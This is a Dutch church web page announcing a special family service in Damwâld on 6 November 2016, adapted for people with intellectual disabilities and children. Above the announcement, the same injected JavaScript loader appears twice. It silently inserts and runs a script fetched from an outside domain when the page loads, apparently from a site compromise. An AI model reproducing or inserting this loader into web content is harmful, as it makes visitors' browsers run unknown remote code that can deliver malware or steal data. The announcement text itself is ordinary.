;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Uitnodiging ... bijzondere gezinsdienst - PKN Damwâld
6 november 2016
10:30 t/m 12:00
Uitnodiging … bijzondere gezinsdienst

Op zondag 6 november wordt in de Doopsgezinde kerk in Damwâld een bijzondere gezinsdienst gehouden. De dienst begint om 10.30 uur en pastor Ietsje zal naar aanleiding van een Schriftlezing uit het Bijbelboek Esther ingaan op het thema: ‘Ik zoek God?!’.

Iedereen is van harte welkom. Na de dienst is er koffiedrinken.

 

Geregeld wordt in een aantal kerken in Damwâld en omgeving aangepaste gezinsdiensten gehouden die met name gericht zijn op  mensen met een verstandelijke beperking. Deze diensten, waarvan er gemiddeld 5 per jaar zijn, worden beurtelings verzorgd door één van de kerken die zijn vertegenwoordigd in de Commissie Gezinsdiensten. Deze diensten kenmerken zich door de heldere en zeer begrijpelijk taal en zijn ook uitermate geschikt voor kinderen.